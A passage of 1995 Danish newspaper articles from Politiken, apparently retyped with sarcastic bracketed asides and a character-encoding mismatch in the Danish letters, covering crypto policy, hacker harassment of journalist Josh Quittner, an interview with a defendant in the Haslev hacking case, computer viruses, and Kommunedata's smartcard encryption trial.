kontroversielt, men ikke tilstr‘kkeligt behandlet, mener konsulent Steffen
Stripp fra TeknologiN‘vnet. Og for at afhj‘lpe dette og give et grundlag for en
dr›ftelse af problemet, har TeknologiN‘vnet netop udsendt rapporten "En dansk
kryptopolitik", hvor en r‘kke eksperter kommer med deres vurderinger af behovet
for "en dansk kryptopolitik", som det mundret hedder. Der findes computer-
programmer, s†kaldte krypteringsprogrammer, som kan sikre elektronisk post mod,
at forkerte ›jne l‘ser dem, men de er ikke synderligt udbredte, og der findes
ingen lovf‘stede standarter p† omr†det. I rapporten rejsen en r‘kke sp›rgsm†l,
blandt andet om hemmeligholdelse af data med retten til privatlivets fred, om
det er lovligt at kryptere data med henblik p† hemmeligholdelse, om det er en
offentlig opgave at opbygge et system til dette, og ikke mindst, hvem der skal
kontrollere de krypteringsn›gler, som anvendes. En dansk krypto-politik inde-
holder bidrag fra blandt andet politiet. Den kan rekvireres hos Teknologi-
N‘vnet, Antonigade 4, 1106 K›benhavn K eller p† telefon 33 32 05 03.





                              Hackernes betvinger
                Politiken, Pernille Tranberg - 19. Oktober 1995
                                 Af Clive Sharp

        Josh Quittner kastede sig ud i †ben krig med hackerne - og fuldst‘ndigt
som ventet slog hackerne igen. Nu starter netguruen [!!!] en ny onlinetjeneste.

        Josh Quittner, en af USAs absolutte cyberspace-guruer og en af hacker-
nes v‘rste fjender, er en travl mand. Fra sit kontor p† 23. etage i Time Warner
bygningen p† Manhattan skriver han artikler til TIME magazine om alt fra
hackerbander og online kasinoer til de nye Macintosh-modeller og telelovgiv-
ningen. Samtidig er han ved at oprette sin egen online nyhedsservice p† World
Wide Web, han underviser universitetsstuderende i "Cyberspace Reporting", og s†
skriver han et par thrillers ind imellem om Internettet.

        Den 38-†rige familiefar er typen, som allerede har sagt nej til to job-
tilbud p† WIRED magazine. Men han er ikke kun en efterspurgt cyberspace-
ekspert. De hackere, som han og hans kone, Michelle Slatalla, har skrevet om i
deres bog, "Masters Of Deception" har l‘nge ›nsket at f† ram p† ham. Det beg-
yndte for n›jagtigt et †r siden p† den amerikanske "Thanksgiving" aften. Hver
gang nogle ringede til dem, fik de en automatisk telefonstemme, som lukkede en
masse vulg‘re ting ud. Deres E-mail blev blokeret, fordi den blev proppet med
tusindevis af u›nskede beskeder. Og hver gang de selv havde ringet og lagt
r›ret p† efter en telefonsamtale, ringede den igen, uden at der var nogle i den
anden ende. Der var hackere p† spil. De havde brudt ind i telefonv‘senets sys-
tem med det eneste form†l at chikanere ham og hans familie p† Long Island, New
York [ja, for andet kan de jo ikke bruge det til, vel???].

        Det er nu tre m†neder siden familien sidst har m‘rket noget til hack-
erne. Josh Quittner er sikker p†, at politiet har fanget den sidste bandit i
den computerbande, der havde set sig ond p† dem [bandit??? computerbande??].
Hackernes chikane har langt fra taget modet fra familien Quittner. -Vi vidste,
at s†dan noget sikkert ville ske, da vi skrev bogen. Og vi har aldrig f›lt os
fysisk truede, for de er ikke fysiske mennesker [heldigt for dem, at de aldrig
har m›dt Leroy og Bobby Ewing!!!]. De er nogle forstyrrede unger, som ›nsker at
bruge deres computere til at ›del‘gge og stj‘le ting, siger Josh Quittner.

        Mange af de onde hackere i "Masters Of Deception", som er oversat til
svensk, tysk og japansk, sidder idag bag tremmer [Hmmm...]. Men der er ogs†
mange gode hackere, siger Josh Quittner. Faktisk er det f›rst de sidste fem-
seks †r, at ordet "hacker" er blevet associeret med noget negativt. F›r i tiden
kaldte man computerprogramm›rer for hackere, og hvis de kreerede korte, gode
programmer havde de lavet "et godt hack". -Mange hackere er ikke destruktive,
de vil ikke ›del‘gge. Nogle af dem, vi skrev om, er nogle fattige kn‘gte, som
har et meget begr‘nset udstyr. De kan hacke sig ind i store systemer og l‘re en
masse om det. De ville aldrig ›del‘gge noget, for hvorfor skulle man ›del‘gge
det, der giver en den st›rste gl‘de i verden.

        LUKKET FOR HACKING.
        Josh Quittner punkterer de romantiske forestillinger som hackere p† sin
vis har form†et at skabe om sig [nej, som pressen har skabt!]. -Det st›rste
problem er, at de taler som om de ejer hele verden. I bund og grund er det
dybt, dybt kedeligt det, de laver, for i dag er det s† godt som umuligt at
hacke sig ind p† de virkelig interessante ting [!!!]. Det kunne man i 1980erne,
da det hele var mere eller mindre †bent. Dengang kunne man manipulere med kre-
ditkort og med telefonv‘senet [og det kan man ikke idag??]. I dag er de fleste
hackere henvist til at samle p† andre Internet-brugeres kodeord. Og det er
m†ske en big deal, eh!

        Josh Quittner begyndte som journalist p† en lokalspr›jte i Albuqueque,
New Mexico. Han l‘ste s† en Masters of Science in Journalism p† Columbia Uni-
versity i New York - hvor han ogs† underviser i dag - og fik derp† job som kri-
minalreporter p† New York Newsday. I 1991 skiftede han stofomr†de og begyndte
at skrive om teknologi. Hurtigt fandt han ud af, at l‘serne ville l‘se om
Internettet. Siden februar i †r har han v‘ret p† TIME magazine efter han takke-
de nej til b†de et job som redaktionschef og som skrivende journalist p† Wired
magazine.

        Ham og Michelle Slatalla har netop afsluttet deres fjerde bog, "Flame
Words", en thriller om Internettet, som udkommer via forlaget Harper Collins
n‘ste †r. Samtidig med at man bliver underholdt, l‘rer man, hvordan man kan
bruge Internettet. Hvis antallet af Internetbrugere forts‘tter med at stige s†
eksplosivt som nu, vil hele verden v‘re online i †r 2002 if›lge Josh Quittners
diagram over v‘kst i befolkningen og Internettet, men s†dan g†r det selvf›lge-
lig ikke, siger han. -Internettet vil dr›ne igennem den udviklede verden som en
Ebola-virus. N†r det kommer til den tredje verden, vil den bremse brat op, for
der har de mange steder hverken telefon- eller computernetv‘rk. Og hvad skal de
ogs† bruge det til, hvis de ikke f†r mad i munden.

        TRAVLT MED AT SIGE OP.
        Internettet er Josh Quittners ‚t og alt. -Det er idag et vidt †bent,
totalt lovl›st sted, og det r†ber p†, at man tager risici og eksperimenterer,
siger han. Og det g›r han s†. 8. November kan Internet-brugere l‘se hans online
"Netly News" p† Time Warners Pathfinder service. De bliver ultrakorte, under-
holdende og morsomme, lover han, og han planl‘gger, modsat andre net-nyheder,
at bruge multimediet ved at eksperimentere med hypertekst, video og lyd. Hans
dr›m er at flytte ud af Time Warners kontor og hjem til familiens hus i Long
Island, sine to sm† piger og Michelle, som lige har sagt sit faste job op p†
avisen Newsday for at arbejde freelance som cyberspaceskribent.

        Han h†ber, at der snart bliver opfundet en m†de, hvorp† man via nettet
kan f† direkte betaling for ens arbejde. At man for eksempel som journalist
eller skribent selv kan putte sine artikler og tekst p† Nettet, og s† m† l‘ser-
ne betale for eksempel 10 ›re for hvert klik med musen. S† snart s†dan en form
for online-micro-betaling eksisterer, er hans dr›m g†et i opfyldelse. -Hvis
Netly News ikke bliver en succes, s† bliver jeg fyret om tre m†neder. Hvis det
bliver en succes, s† siger jeg op om seks m†neder, for s† har jeg bevist, at
det kan fungere, og s† kan jeg tage alle mine ideer og sige farvel, siger Josh
Quittner. -Og det er det, der er s† smukt og magtfuldt ved Internettet. Det
giver os, du og jeg, kontrol over distributionen. Vi beh›ver ikke TIME magazine
eller Pathfinder til at distribuere vores ideer. Med Nettet kan vi selv. Pro-
blemet lige nu er bare, at det er gratis. Netly News er p† World Wide Web efter
8. november p† adressen: http://www.pathfinder.com/netly.





                           Dixie - en hacker har talt
                 Politiken, Christian Harbou - 26. Oktober 1995
                                 Af Clive Sharp

        Hackeren Dixie venter p† at blive stillet for retten i danmarkshistori-
ens st›rste hackersag. En sag, som han mener, er bl‘st alt for stort op. Compu-
ter har talt med ham.

        Han starter med at spise r›gen fra tre cigaretter og stille krav om at
f† at vide, hvad jeg helt n›jagtigt har t‘nkt mig at skrive. Det kan jeg selv-
f›lgeligt ikke fort‘lle ham, f›r han selv har fortalt sin historie. Men efter
10 minutter er det lykkedes at f† den 23-†rige studerende og tiltalt i den
store hackersag, alias Haslev-sagen, beroliget s† meget, at jeg kan stille det
f›rste sp›rgsm†l: -Hvor meget tror du, du f†r? S† rasler korthuset sammen en
gang til. Han skodder en cigaret, som han lige skulle til at t‘nde, og ser p†
mig med ›jne, der slet ikke ser mig, men en skr‘kfilm i den indre biograf.
Skranken, dommeren, den rasende anklager, de ulykkelige for‘ldre p† bageste
r‘kke i salen. Pressen, der venter med blitzlys udenfor.

        De ›jne, der stirrer p† mig som om jeg var "the man, you wouldnt wanna
meet" fort‘ller historien af sig selv. Der er h›j cigarf›ring i vennekredsen,
s†l‘nge man er superhacker og har hjernevindinger til at bryde komplicerede
adgangskoder. Men smilet stivner, n†r man en r†kold aften lidt f›r jul kommer
hjem og finder to kriminalbetjente, der sidder inde i stuen og venter sammen
med far og mor. -H›jst betinget. Det kan aller h›jest blive en betinget dom,
n†r han frem til efter en lang og kompliceret fremstilling.

        ANNONYMITETEN
        Kunstnernavnet er Dixie. Og mere vil han ikke ud med. Den virkelige id-
entitet holder han t‘t til kroppen. Men valget af navn f†r vi lige vendt i luf-
ten. Det viser sig, at Dixie rent faktisk ikke ved, at det latinske ord dixi
betyder: Jeg har talt. Man kunne ellers meget let forestille sig, at der havde
ligget en tanke bag ved navnevalget. For det ville jo v‘re i tr†d med g‘ngs
hacker-moral, hvis Dixie begrundede sine bes›g i forskellige computersystemer
som et fors›g p† at p†vise, at systemerne er hullede som et d›rslag. Han kom
ind - dermed havde han talt.

        Men valget af kunstnernavn, d‘knavn, hackernavn - hvad man nu vil - var
tilf‘ldigt. Dixie opd›bte sig selv efter hovedpersonen i William Gibsons roman
Neuromancer, som i slutningen af 80erne fik kultstatus og blev en bibel for s†-
kaldte cyber-punks. Desuden er han enten for klarhjernet eller for ‘rlig til at
give sine handlinger som hacker en morals overfrakke.

        HACKERKULTUREN
        - Det er rigtigt nok at jeg og andre hackere dokumenterede, at der var
huller i sikkerhedssystemerne ved at komme ind. Men det var ikke det der var
form†let med at hacke, siger Dixie. Hacking er ganske enkelt en kultur, som
fortrinsvis lever blandt unge m‘nd med stor erfaring i at bruge en computer.
Form†let er at l›se g†der i den r‘kkef›lge de dukker op og fors›ge at komme
l‘ngst muligt ind i et system. -Det kan sammenlignes med at spille de tekst-
adventure spil, der kom frem som nogle af de f›rste spil til computeren. Der
g†r sport i at komme l‘ngst muligt og hver g†de tilskynder dig til at blive
ved, tilf›jer han.

        I virkeligheden var det en lille computer med tilh›rende adventure-spil
der fik Dixie i gang med sin specielle interesse. Som 12-†rig fik han en VIC 20
med 5kb ram af sine for‘ldre i julegave. Men det var f›rst efter et par †r ved
tasterne og siden en pause p† et par †r - hvor en masse andre ting var mere
interessante, for eksempel pigerne i skolen - at facinationen ved at bruge en
computer og et modem til at kommunikere med omverden blev bragt til live. Fil-
men WarGames spillede p† det tidspunkt millioner ind og blev vist i en hvilken
somhelst fl‘kke verden over og inspirerede blandt andet Dixie til at g† p† Net-
tet.

        N‘ste trin i udviklingen bestod i opringninger til elektroniske opslag-
stavler, de s†kaldte BBSer. Blandt andet til Ravans Rock, der var et af de f›r-
ste steder her i landet, hvor man kunne m›de andre unge mennesker med interesse
for Cyber-punk-kulturen. M›der p† nettet blev til venskaber, som ogs† omfattede
at man m›dtes privat. Erfarne hackere delte ud af deres viden og fik status som
forbillede for de mindre erfarne. En anden foruds‘tning for at f† succes som
hacker bestod i at f† fat i gode maskiner. Dixie gik med aviser on anskaffede
sig f›rst en 286er, siden en 486er. Dixie oprettede sit eget BBS med blandt
andet opskrifter p† at kn‘kke sikkerhedssystemer, som blev hentet ned fra
Internet.

        NYSGERRIGHED
        Det store skridt for Dixie bestod formentlig i, at han kunne hente
Linux - en klon af det professionelle styresystem Unix - p† Internet. Med sit
eget Unix system p† pc'en kunne han g›re sig selv til system-administrator.
-Man kunne sidde og n›rkle rundt med det i flere timer for at f† det til at
k›re. Det medf›rte p† den ene side, at jeg kunne s‘tte mig ind i tankegangen
hos en sikkerhedschef i en virksomhed. Men det t‘ndte ogs† min nysgerrighed for
at komme ind i store edb-systemer for simpelthen at se, hvordan de var sat op,
fort‘ller Dixie. Han blev ogs† en stadig mere integreret del af et milj›. Fik
nye venner. Der var dog ikke tale om organiseret hacking, fort‘ller Dixie. Hver
hacker havde sit eget dom‘ne. I enkelte tilf‘lde kunne flere hackere skaffe sig
adgang til samme maskine, men i de fleste tilf‘lde gav man hinanden arbejdsro
og undgik m›jsommeligt at tr‘de hinanden i bedene.

        Fremgangsm†den, der skulle sikre den enkelte hacker mod at blive afsl-
›ret gik ud p† at bruge s† mange mellemstationer som muligt. Dixie kan ikke
fort‘lle, hvordan han bar sig ad eller hvilke maskiner og virksomheder, han
selv hackede. F›rst og fremmest fordi han venter p†, at politiet skal f† lagt
sidste h†nd p† anklageskriftet, s† sagen kan komme for retten.

        OMVEJENE
        Men politiet har tidligere lettet en del af sl›ret over for pressen.
Hackerne koblede sig p† Internet via enten universiteter eller gymnasier. Fra
udgangspunktet, som eksempelvis kunne v‘re Holte Gymnasium, blev servere fem,
seks eller syv forskellige steder i verden brugt som mellemstationer, f›r der
blev etableret forbindelse til den virksomhed, som det var hensigten at hacke.
Ruten kunne g† over Hamborg, Tel Aviv, London, Sidney, Bombay for eventuelt at
ende et sted i USA eller for den sags skyld hjemme i Danmark igen. De mange led
p† vejen skulle forhindre politiet i at spore hackerne bagl‘ns. Og med frem-
gangsm†den lykkedes det enkelte af hackerne, som er sigtet i Haslev-sagen, at
komme ind i en r‘kke s‘rdeles f›lsomme computer-systemer. Dixie oplyser, at han
ikke selv har v‘ret inde i de meget store computer-systemer.

        Men verden fik for alvor ›jnene op, da det viste sig, at andre danske
hackere havde kn‘kket adgangskoden til den amerikanske vejrtjenestes computer,
som blandt andet leverer oplysninger til luftfartsselskaberne, og siden ogs†
skaffede sig vej ind i selve Pentagon. Der var ingen, der kom s‘rligt dybt ind
i Pentagons systemer. Men indbruddet i vejrtjenestens computer kunne if›lge
politiet have for†rsaget en katastrofe. Hackerne, der kom ind hos vejrtjenesten
menes at have v‘ret i stand til at ‘ndre i ops‘tningen af systemet, s† det hele
tiden meddelte den sikkerhedsansvarlige, at der ikke var noget galt. Bag de
troskyldige meddelelser til sikkerhedschefen om fred og ingen fare, kunne hack-
erne bruge supercomputeren til at kn‘kke adgangskoder til andre edb-systemer.

        -Det er n‘rmest en regel, at jo st›rre et system er, jo flere adgangs-
veje er der til systemet og jo lettere er det at komme ind, siger Dixie. Det
sikkerhedsm‘ssige problem l† imidlertid i, at maskinen kunne have betydning for
data, der eksempelvis skulle bruges til at dirigere lufttrafikken. Indbruddet i
vejrtjeneste-computeren kunne s†ledes have f†et alvorlige konsekvenser for fly-
sikkerheden, har politiet fremf›rt.

        POLITI-CHIPS
        Men legen fik en ende. I slutningen af november er det to †r siden, at
Dixie og seks andre unge hackere blev hentet med p† stationen og varet‘gts-
f‘ngslet. Dixie husker kriminalbetjentene som meget venlige. -De havde en pose
med chips med til mig i bilen. P† stationen var de ogs† im›dekommende. Til at
begynde med. Han blev indsat i en celle med en skarp lampe t‘ndt i loftet og
fik besked p†, at han lige straks ville blive hentet ind til forh›r. Men der
gik timer. N‘ste dag blev han lagt under pres for at angive andre hackere.
Senere voksede presset, da politiet opdagede, at der var krypterede filer p†
Dixies harddisk. Krypteringen - alts† kodningen - ville udelukke politiet i at
l‘se filerne.

        Politiet p†stod derfor, at de ville s‘tte super-computeren p† Uni-C til
at bryde krypteringsn›glen. Politiet sagde samtidig, at den sigtede ville komme
til at betale regningen. S† Dixie kunne jo nok forst†, at han ville spare sig
selv og sine for‘ldre for en stor udgift ved at komme i tanke om n›glen i en
fart. Politiet stod her over for noget helt nyt. P† den ene side af bordet sad
de unge m‘nd, der kunne bryde ind i Pentagon fra en pc i b›rnev‘relset. P† den
anden side sad kriminalbetjentene, der stadig havde f›dderne solidt plantet i
en tidsalder, hvor det prim‘re arbejdsredskab var en elektrisk skrivemaskine.

        OVER STREGEN
        I dag ser Dixie selv nogle af sine handlinger som lige over stregen.
Det gjorde han ikke dengang, hvor det stod p†, og hvor han var drevet af nys-
gerrighed. -Det er da klart at omfattende hacking ikke kan tolereres. Men jeg
mener ikke, at det, jeg har gjort, er bare halvt s† alvorligt, som politiet
gerne vil bl‘se det op til, siger Dixie. Anholdelserne blev signalet til et op-
klaringsarbejde af hidtil usete dimensioner for politiet. Dixies tre computere
blev beslaglagt og indholdet af harddiskene skrevet ud - flere millioner ark
papir. -For mig at se har politiet kastet sig ud i et langt st›rre arbejde, end
de egentlig havde beh›vet.

        -Jeg er nok kommet i s›gelyset, fordi jeg k›rte et BBS p† min computer
med blandt andet informationer om hacking. -Men hovedparten af det, politiet
har kunnet finde p† mine harddiske, har v‘ret ganske uskyldige sager fra kon-
ferencer om madlavning til erotiske noveller. -Man vil selvf›lgeligt anklage
mig for at have spredt oplysninger om at hacke. Men de anklage er st‘rkt over-
drevet, for de informationer om hacking, som jeg har haft liggende p† mit BBS,
blev hentet ned fra Internet og var i forvejen tilg‘ngelige for alle. -Det er
selvf›lgeligt en alvorlig sag at hacke, hvis det sker for pengenes skyld eller
af politiske grunde. Jeg har ikke set, at hackere har v‘ret blandet ind i
›konomisk kriminalitet i Danmark, men det kan jo komme, forts‘tter Dixie.

        -Jeg vil imidlertid forsvare mig med, at jeg ikke har gjort noget for
at tjene penge p† det. Jeg har ikke stj†let noget, og jeg har ikke ›delagt
noget eller skabt kaos i de maskiner, som jeg har v‘ret inde i. De kriminelle
forhold i den store hackersag kan efter Dixies opfattelse sidestilles med den
situation, hvor en gruppe unge kravler over hegnet til en afl†st fabriksgrund.
-Jeg var personligt kun inde for at se mig omkring. Jen kunne m†ske ikke rigtig
bed›mme alvoren selv. Jeg s† blot nogle forhindringer der m†tte overvindes. Og
jeg fik aldrig nogen sinde besked p† i direkte vendinger, at jeg var uvelkom-
men. Selvom jeg blev opdaget, s† l† sikkerhedsfolkene som spioner og lurede.
Jeg fik aldrig besked p†, at jeg bare havde at komme ud. De har selvf›lgelig
v‘ret tavse for at lure p† mig og spore mig. Men n†r jeg ikke fik noget at
vide, s† fik det mig til at f›le, at det nok ikke var s† alvorligt, siger
Dixie.

        MORALEN
        -Jeg havde nogle grundregler, som jeg arbejdede efter. De handler om,
at du for det f›rste ikke m† arbejde for andre. Der m† heller ikke v‘re penge
involveret, og du m† ikke hacke af politiske grunde. Hvis du overskrider en af
de grunde som hacker, s† er det, at det bliver farligt. -Jeg kan godt se, at
hvis politiet ikke standser hacking, s† vil vi f›r eller siden se, at der er
folk, som bruger deres viden for penge. -Jeg har imidlertid ikke gjort noget,
som overhoved kommer i n‘rheden af ›konomisk kriminalitet. Derfor mener jeg
overhoved ikke, at jeg kan st† til en f‘ngselsdom. Hvis jeg skal d›mmes, kan
det aller h›jst blive en lille, betinget dom, siger Dixie s† indtr‘ngende, at
man skulle tro, at han allerede talte til dommeren.

        Hans problem er selvf›lgelig, at en streng dom vil kunne ›del‘gge hans
fremtid. Han studerer og en dom vil ikke g›re det lettere at finde job. Dixie
fort‘ller, at han har lagt sin gamle fritidsbesk‘ftigelse p† hylden. Men inter-
essen for sikkerhedssp›rgsm†l lever stadig i bedste velg†ende. En fremtid for
Dixie kunne s†ledes komme til at handle om at skabe sikkerheds-systemer, der
ikke kan brydes.





                              Digitale infektioner
                   Politiken, Henrik Palle - 2. November 1995
                                 Af Clive Sharp

        Computervirus er stadig en trussel mod pc'ernes sundhed. Ogs† selvom
sikker computersex er g†et af mode. Hvem husker ikke postyret tilbage i 1992,
da Michelangelovirusen var l›s, og folk malede Fanden p† v‘ggen og profeterede
om det totale edb-sammenbrud i anledning af den italienske renaissancekunstners
f›dselsdag den 6. marts. Virus-programmer [her m† vi nok g† ud fra, at han
mener ANTI-virusprogrammer -Red] blev med et slag en vare i h›j kurs - og folk
gik rundt og fortalte hinanden historier om, at en af deres venner kendte en,
der havde f†et slettet sin harddisk og mistet hele sit n‘sten f‘rdige danskspe-
ciale om Utopia-begrebet i Svend Aage Madsens tidlige romaner. S† gik tiden, og
glemselen s‘nkede sig over computer-virus-f‘nomenet. Man begyndte igen at bytte
disketter med vennerne uden n›dvendigvis af tjekke dem efter med Dr. Solomon,
Norton Antivirus Toolkit, McAfee, eller hvad de nu hedder, virusprogrammerne
[ANTI-virusprogrammerne, tak! -Red].

        WIN95-VIRUS.
        I forbindelse med lanceringen af Windovs 95 var den der imidlertid
igen. Rygterne svirrede om en helt ny type virus, der i mods‘tning til tidlig-
ere forekomster af f‘nomenet lagde sig i tekstdokumenter og ikke kun inficerede
programfiler - som man havde v‘ret vant til. En bruger p† den amerikanske on-
line tjeneste America On Line havde angiveligt p†draget sig virus fra et elek-
tronisk brev med titlen 'Good Times'. Og s† k›rte rouletten igen. Ogs† selv om
der slet ikke var tale om en rigtig virus, men om en s†kaldt makro - et lille-
bitte program, som udf›rer en bestemt funktion i eksempelvis et tekstbehand-
lingsprogram eller et regneark. Men selv om frygten for og opm‘rksomheden over
for virus bev‘ger sig i b›lger, er det ikke et udtryk for, at virus er et
periodisk f‘nomen. De sm† modbydelige programstykker, der kan lave forf‘rdelige
ulykker i computerens f›lsomme interne system, er hele tiden iblandt os. Men
private brugere bem‘rker m†ske ikke, at de har ubudne g‘ster p† harddisken.
Mange virus-former giver nemlig ikke anledning til nogle synderlige symptomer,
f›r efter lang tid. Og desuden findes der en r‘kke meget avancerede og effek-
tive virus-detektions og - udryddelsesprogrammer, som kan fjerne de digitale
bakterier uden de store skadevirkninger.

        LEGALISER MARIHUANA.
        Den f›rste computervirus s† dagens lys i midten af firserne, hvor nogle
dataloger blev opm‘rksomme p† et lille stykke programkode, som kunne formere
sig. Opdagelsen bredte sig, og man fandt ud af, at s†danne sm† programstumper
kunne s‘ttes til at udf›re forskellige funktioner. Computervirus var en reali-
tet. Og f‘nomenet begyndte at brede sig. I begyndelsen var de fleste virus gan-
ske harml›se og forvoldte ikke nogen videre skade p† de inficerede systemer. En
forekomst fik meddelelsen 'Legalize marijuana' til at dukker frem p† den infi-
cerede computers sk‘rm, en anden fik bogstaverne til at falde ned i bunden af
sk‘rmbilledet. Og der findes talrige andre eksempler p† s†danne sp›gefulde vir-
us.

        ANGRIBER STRUKTUREN.
        Men andre typer, som var langt mere ondsindede meldte ogs† deres an-
komst. I dag findes der en 5.000 - 6.000 tusinde forskellige former for com-
putervirus med varierende farlighed. Fra milde influenza-fork›lelsesbaciller og
til den d›dsensfarlige Ebola Zaire-virus. En af de mest udbredte er Form-
virussen. Den l‘gger sig i computerens s†kaldte boot-sektor, og kopier sig der-
fra videre til de disketter, som computeren skriver p†, hvis man kopier filer
over p† disketter. Og s† er der ellers d›mt epidemi. Man kan have Form virus i
lang tid, uden at v‘re klar over det - hvis ikke man har installeret et virus-
scanningsprogram. Det er f›rst, n†r det i princippet er for sent, at Form-
virussen viser sin tilstedev‘relse. Den angriber computerens - i virkligheden
styresystemets - FAT-tabel (File Allocation Table), som indeholder oplysninger
om harddiskens struktur med hensyn til placering af informationer. Faktisk kan
den finde p† at slette den. Og det vil sige, at computeren ikke l‘ngere kan
finde ud af, hvor den har lagt de forskellige filer. Med det beklagelige resul-
tat, at disken m† formateres om, hvormed alle informationerne p† den slettes.

        SIKKERHEDSKOPIER.
        Helt s† slemt beh›ver det dog ikke at g†. Som n‘vnt findes der en lang
r‘kke programmer, der kan restaurere b†de harddiske og floppydisketter - uden
at informationerne n›dvendigvis g†r tabt. Det afh‘nger dog af, hvor alvorligt
angrebet er. Opdages Form-virussen i tide, kan den fjernes ved, at man kopierer
styresystemets skjulte opstartsfiler oven i de angrebne. Af en aller anden gru-
nd er det f›rst og fremmest DOS og OS/2-systemer, der har v‘ret genstand for
virusprogram›rernes luner. Mac-brugerne har aldrig v‘ret plaget af virus i
noget n‘vnev‘rdigt omfang. For privat brugere er virus-angreb naturligvis en
ubehagelig foreteelse. Man kan v‘re uheldig og miste alle sine data, hvis man
ikke har husket at tage sikkerhedskopier. Og det er ikke alle der husker det,
for som der st†r p† en af de fotokopierede sedler, man ser h‘ngende rundt om p†
landets kontorer: "Rigtige m‘nd tager ikke sikkerhedskopier". Et sted havde en
kynisk personage nedeunder tilf›jet med tusch: "Men de gr‘der ofte".

        RYSTEN I BUKSERNE.
        Imidlertid er virus et langt st›rre problem for de store edb-installa-
tioner i erhvervslivet, hvor tab af data er 100 procent ensbetydende med tab af
(rigtig) mange penge. Da rygterne i sin tid svirrede om virus, var det da ogs†
edb-cheferne for post-terminaler, forsikringsselskaber og banker, der rystede
mest i bukserne. De ansatte fik besked p†, at de ville blive afskediget, hvis
det kom frem, at de havde haft disketter med spil med p† arbejde - eller p†
anden m†de kompromitteret virksomhedens edb-sikkerhed. Spredningen af virus var
dog st›rst, dengang almindelige menneskers computere endnu ikke som standart
var udstyret med harddiske og computerspil kunne v‘re p† en enkelt diskette,
som desuden indeholdt systemfiler til dos, s†ledes at spillet kunne k›re dir-
ekte fra en diskette. De fleste computervirus angriber nemlig programfiler, dem
der hedder .exe eller .com til efternavn [Til efternavn?!? -red]. Og s†danne
findes p† disketter med spil og systemfiler. Man regner da ogs† med, at udvek-
slingen af spil er den st›rste smittekilde for spredningen af computervirus.

        VIRUSSKJOLD.
        Siden de f›rste forekomster af virus har f‘nomenet naturligvis udviklet
sig. De programm›re der udvikler virus, er blevet dygtigere, og verden har set
virus der hele tiden ‘ndre sig, hvilket g›r dem vanskelige at opdage. Hvis man
vil sikre sig mod virus, er der forskellige ting, man b›r g›re. Man b›r instal-
lere et s†kaldt virus-skjold p† sin computer. Det er et program, som scanner
alle disketter, der bliver sat i computerens diskettedrev, og som hver gang
computeren startes unders›ger den interne hukommelse for virus. Desuden b›r man
med j‘vne mellemrum lade et virus-scannerprogram scanne harddisken for inficer-
ede filer. Og skulle man havde p†draget sig en virus, m† man bide i det sure
‘ble og tjekke alle sine disketter med virus-scanneren. Endelig b›r man opda-
tere sin virus-scanner med j‘vne mellemrum, da der hele tiden kommer nye virus
til. Anti-virus-programmer findes der adskillige af. Et af de mest popul‘re er
McAfees, som Politikens Computerklub distribuerer.





                           Privatliv sikret p† Nettet
               Politiken, Michael Berg Larsen - 2. November 1995
                                 Af Clive Sharp

        Kommunedata er klar med 100 procent sikker kommunikation p† Internet -
s† sikker at Kommunedata har udlovet en dus›r til dem, der kan kn‘kke koderne.
Kun et borgerkort mangler, f›r systemet fungerer.

        Hidtil har problemer med manglende sikkerhed lagt en d‘mper p† ud-
vekslingen af informationer p† Internet - og dermed h‘mmet udviklingen af info-
rmationssamfundet. Men nu har Kommunedata l›st problemet ved hj‘lp af et for-
holdsvist simpelt og fleksibelt system. Rent teknisk er der derfor ikke l‘ngere
de store hindringer for, at vi for eksempel fremover kan sende selvangivelser,
flyttemeddelelser, ans›gninger om sociale ydelser og andre fortrolige meddel-
elser via for eksempel Internet. Men der er til geng‘ld en stor politisk hur-
del. Teknologien i det omdiskuterede borgerkort er nemlig en vigtig del i Kom-
munedatas fors›g.

        I Kommunedatas fors›g fungerer borgerkortet dels som en slags elektro-
nisk identifikation og dels som b‘rer af ens personlige krypteringskort. Og
uden et borgerkort - ingen sikker kommunikation. Borgerkortet skal monteres i
en kortl‘ser, der er forbundet med computeren. Computeren f†r p† den m†de de
data, der er n›dvendige for at kryptere informationerne og dermed sikre, at ens
e-mail ikke kan opsnappes p† Nettet. Og krypteringsn›glen forlader aldrig bor-
gerkortet. Samtidig sikrer borgerkortets software, at der ikke er tvivl om,
hvem der har sendt beskeden. Ens e-mail f†r nemlig en elektronisk signatur.

        Borgerkortet benytter public key-metoden, hvor e-mailer ved hj‘lp af en
speciel teknik krypteres og dektypteres uden at afsenderens personlige kryp-
teringsn›gle afsl›res. Teknologien er billig. Borgerkort og kortl‘ser koster
omkring en 5-600 kroner. Derudover kr‘ves der nogle sm† software-stumper. If›l-
ge matematiske beregninger, er sandsynligheden for at koderne kan kn‘kkes uen-
delige sm†. Kommunedata udlover derfor en dus›r p† 50.000 kroner, hvis der er
nogle, der kan kn‘kke koderne. P† Kommunedatas hjemmeside - http://www.kmd.dk -
vil der v‘re en henvisning til en speciel hjemmeside, hvor man kan f† lov at
fors›ge sig.

        Hidtil har virksomheder og offentlige institutioner kommunikeret i
lukkede netv‘rk ved hj‘lp af krypteringeprogrammer. Men den l›sning er ikke
s‘rlig fleksibel, hvis der for alvor skal gang i udvekslingen af elektroniske
dokumenter. Kommunedatas l›sning sikre ‚n krypteringsstandart. Alle kan kommu-
nikere med alle. Samtidig er man ikke bundet til at kommunikere fra ‚n com-
puter. Med et borgerkort i h†nden kan man for eksempel sende fortrolige e-mails
fra skrivebordet p† jobbet eller fra den b‘rbare computer i sommerhuset.

        FIRMAER F‌RST.
        - Der er store kommercielle muligheder i sikker kommunikation i †bne
net, mener projektleder Keld Poulsen fra Kommunedatas Innovationsafdeling. Hid-
til har erhvervslivet ikke udvekslet elektroniske dokumenter i st›rre omfang.
Dels p† grund af sikkerheden, og dels fordi den mest optimale l›sning er, at en
virksomhed kan kommunikere med alle andre virksomheder, institutioner og enk-
eltpersoner. Men Keld Poulsen har ikke sv‘rt ved at forestille sig, at det nu
vil ske - specielt da Kommunedata p† dette omr†de ikke beh›ver vente p†, at
politikerne bliver enige om borgerkortet.

        Han forstiller sig, at virksomhederne i stedet vil kunne blive udstyret
med et borgerkort-lignende smartcard, der kan klare de samme opgaver. Keld Pou-
lsen understreger dog, at produktet ikke er salgsmodent endnu, men at det hur-
tigt kan blive det, hvis der viser sig tilstr‘kkelig stor interesse for det.

        SKAT Pڈ NETTET.
        Det tekniske gennembrud vil Kommunedata ogs† bruge til at stimulere
debatten om borgerkortet. Det sker sidst i december, hvor Kommunedatas hjemme-
side bliver forum for diskusionsgrupper om borgerkort og kryptering. Desuden
vil politikere fra alle niveauer f† mulighed til at f† en smagspr›ve p† den nye
teknologis muligheder. Allerede nu kan man p† http://www.kmd.dk se, hvordan
